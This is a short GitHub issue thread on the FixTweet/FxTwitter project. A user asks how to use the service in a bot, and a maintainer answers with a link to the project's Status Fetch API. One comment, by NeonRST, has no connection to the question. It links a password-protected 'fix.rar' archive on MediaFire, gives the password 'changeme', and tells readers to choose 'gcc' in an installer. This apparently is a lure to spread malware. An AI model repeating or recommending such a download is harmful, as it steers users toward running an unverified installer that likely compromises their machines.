### ISSUE TITLE
Bot

### ISSUE THREAD

**Issue by JhonyBravoX** [FixTweet/FxTwitter#953]
I want to implement this into my bot.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dangeredwolf** [comment]
... okay? Use the API :P https://github.com/FixTweet/FxTwitter/wiki/Status-Fetch-API
